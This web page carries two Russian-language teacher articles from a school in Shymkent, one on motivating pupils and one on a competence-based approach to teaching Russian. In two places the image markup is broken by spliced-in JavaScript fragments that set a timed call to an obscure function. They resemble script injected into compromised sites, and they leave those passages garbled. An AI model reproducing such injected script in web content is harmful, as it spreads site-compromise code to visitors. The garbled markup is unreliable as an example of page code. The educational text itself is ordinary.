2022-12-10

Развитие и совершенствование навыков в учебной деятельности школьников

Spread the love

«Единственный путь, ведущий к знанию это деятельность»

Бернард Шоу.

Для достижения цели необходим творческий подход к обучению детей. Воспитанию положительной мотивации учения способствует общая атмосфера в школе и в классе.

Для того чтобы помочь школьнику в новой и сложной для него деятельности – учебе, мы должны понять, чего мы хотим достичь. Если мы думаем, что уметь учиться – это получать одни пятерки, мы подменяем понятия и стремимся к результату ,минуя процесс.

Если мы считаем, что уметь учиться – это не шалить и слушаться учителя, мы обращаем внимание на внешнюю сторону обучения, точнее умение вести себя на уроке. Следует понять, как ребенок(ученик) не стеснялся признаться в своих трудностях ни родителям, ни учителям.

Изменение поведения учащегося в цепочке:

001dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/001.jpg» height=»61″ width=»300″ />

Если он не понял что-то на уроке,чтоб он не стеснялся переспросить учителя.Школьник должен усвоить,что учитель в школе для того,чтобы учить.

Цель образования — это не оценка,а овладение знаниями и умениями.

Лишь первая и,как показывает повседневная практика,абсолютно недостаточная ступень.

Приемы стимулирования школьников и рекомендации к классным руководителям

«Если человек соединяет в себе любовь к делу и к ученикам,он—совершенный учитель»

Л.Н.Толстой

а) Вовлечение ученика в общественную работу коллектива класса.

b) Сотрудничество учителя и ученика.

c) Помощь учителя в виде советов,которые наталкивают ученика на правильное решение.

d) Привлечение ученика оценивать свою деятельность и дать ей характеристику.

е) Стимулированию школьника также способствует материал,который вызывает интерес и удивление ученика.

Рекомендации:

  1. Эмоциональная речь учителя.
  2. Познавательные игры, ситуации спора и дискуссии. При организации ролевых игр помните, что учителю требуется уважать чувства учеников. Учителю запрещается навязывать ученику свою точку зрения по поводу спорных вопросов.
  3. Анализ жизненных ситуаций. Разъяснение общественной и личной значимости учения.
  4. Применение учителем поощрения и порицания.

Невозможно заранее учесть все возможные приемы стимулирования учащихся.Но понимающий учитель, вооруженный знаниями поможет ребенку пережить трудный для него период с минимальными потерями.

Рекомендуется не ограничиваться проведением «мероприятий» (уроков, классных часов ,факультативов, семинаров-тренингов) с учащимся, но развивать работу с педагогами школы и родителями реализуя, стратегию:

 002dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/002.jpg» height=»68″ width=»300″ />{jcomments off}

 

КОМПЕТЕНТНОСТНЫЙ ПОДХОД В ПРЕПОДАВАНИИ РУССКОГО ЯЗЫКА И ЛИТЕРАТУРЫ.

Дуйсебекова Салия Сиябековна,сш.№17 им.Лермонтова.г.Шымкент

Основной проблемой, стоящей перед педагогом, внедряющими компетентности подход в преподавании языка,является проблема создания открытого языкового пространства.Речь идет об изменении приоритетов в преподовании:переходе в преподовании с предметного уровня на обучение языку как средству общения.Требуется создать условия,приближенные к естественной коммуникации.В основе уроков русского языка в старшей школе лежит пратико-ориентированный подход,опирающйся на опыт практической деятельности обучающихся ситуации,основными составляющими которой являются:

         Образовательная напряженность;

         Уточнение образовательного объекта;

         Конкретизация задания;

         Решение ситуации;

         Демонстрация образовательной продукции;

         Систематизация полученной продукции;

         Работа с культурно-историческими аналогами;

         Рефлексия.

Система заданий на таких занятиях предполагает создание готового образовательного продукта:написание аргументированного эссе,творческой работы,ориентированной на цели и задачи коммуникации.В качестве подготовительного этапа учащиеся занимаются комплексным анализом текста,лингвистическим анализом,сопоставительным анализом.Определением темы,идеи,стиля,типа речи становится не целью,а лишь средством достижения той или иной цели.Задача учащихся – создать собственные примеры.Таким образом,в процессе работы учащиеся не только работают над неморфемными способами образования,комплексным анализом текста, но и создают собственный продукт.Причем форма работы может быть определена самими учащимися:отзыв,эссе,эпистолярный жанр,статья в лингвистический справочник,серия вопросов,заданий,тестов по данной теме с обязательной защитой своей работы.Таким образом на данных уроках закладывается и опыт публичного выступления,навыков ведения дискуссии и полемики.

Информационные технологии,рассматриваемые как один из компонентов целостной системы обучения,не только облегчают доступ к информации,открывают возможности вариативности учебной деятельности,ее индивидуализации и дифференциации,но и позволяют по новому организовать взаимодействие всех субъектов обучения,построить образовательную систему,в которой ученик был бы активным и равноправным участником образовательной деятельности.

Цуркан А.Н. – психолог

Сш.№17 им.Лермонтова г.Шымкент.

Яндекс.Метрика